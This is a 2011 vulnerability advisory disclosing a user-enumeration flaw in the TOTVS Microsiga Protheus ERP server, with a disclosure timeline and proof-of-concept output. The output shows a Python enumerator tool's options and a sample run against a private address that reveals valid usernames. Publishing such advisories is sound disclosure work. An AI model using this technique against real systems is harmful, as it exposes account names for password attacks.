[DCA-2011-0002]


[Discussion]
- DcLabs Security Research Group advises about following vulnerability(ies):

[Software]
- TOTVS ERP Microsiga Protheus

[Vendor Product Description - Portuguese]
- Software de Gestão - TOTVS
A TOTVS é uma empresa de software, inovação, relacionamento e suporte
à gestão, líder absoluta no Brasil, com 49,1% de share de mercado, e
também na América Latina, com 31,2%*, é a maior empresa de softwares
aplicativos sediada em países emergentes e a 7ª maior do mundo no
setor.Tem mais de 25,2 mil clientes ativos, conta com o apoio de 9 mil
participantes e está presente em 23 países.
Proposta de Valor
Tornar a empresa mais competitiva, com maior velocidade de decisão,
oferecendo soluções que organizam, disciplinam, definem e impõem
processos, armazenam dados, geram informação e auxiliam a gestão.
- Fonte: http://totvs.com.br/web/guest/software

[Advisory Timeline]
- 02/Feb/2011 -> Initial contact to vendor, security contact request.
- 03/Feb/2011 -> Security contact response.
- 03/Feb/2011 -> First notification sent, release date set to March 01, 2011.
- 04/Feb/2011 -> Vendor confirms notification received.
- 21/Feb/2011 -> Situation report requested.
- 01/Mar/2011 -> No vendor response.
- 02/Mar/2011 -> Advisory published.

[Bug Summary]
- Users enumeration

[Impact]
- Low

[Affected Version]
- Microsiga Protheus 8 (20081215030344)
- Microsiga Protheus 10 (20100812040605)
- Other versions can also be affected but weren't tested.

[Bug Description and Proof of Concept]
- The server validates the user before asking for a password, thus we
can keep trying usernames until we get a password prompt.

- A Proof of Concept has been created:

--- command line output begin ---
[waKKu@localhost: codes] # ./totvs_users_enumerator.py -h
usage: totvs_users_enumerator.py [options] [filename]
  -h for help

options:
 --version             show program's version number and exit
 -h, --help            show this help message and exit
 -i IPADDRESS, --ipaddress=IPADDRESS
                      Server IP address
 -p PORT, --port=PORT  Port number (defaults to 1234)
 -t TARGET, --target=TARGET
                      Target Version: 8 -> Protheus 8 | 10 -> Protheus 10.
                      Defaults to 10

[waKKu@localhost: codes] # ./totvs_users_enumerator.py --target 10
--ipaddress 192.168.4.95 userlist
Valid user: admin
Invalid user: fakeuser
Invalid user: nobody
Valid user: jonas
Valid user: fernando
Invalid user: elvis
--- command line output end ---

----------------------------------------------------------------------------------------

All flaws described here were discovered and researched by:
Flávio do Carmo Júnior aka waKKu.
DcLabs Security Research Group
carmo.flavio <AT> dclabs <DOT> com <DOT> br

[Workarounds]
- An initial workaround was provided to block user after 3 failed
password attempts, but it doesn't work against this kind of users
enumeration.

[Credits]
DcLabs Security Research Group.

-- 
--
Atenciosamente,

Flávio do Carmo Júnior aka waKKu @ DcLabs
Florianópolis/SC
http://br.linkedin.com/in/carmoflavio
http://0xcd80.wordpress.com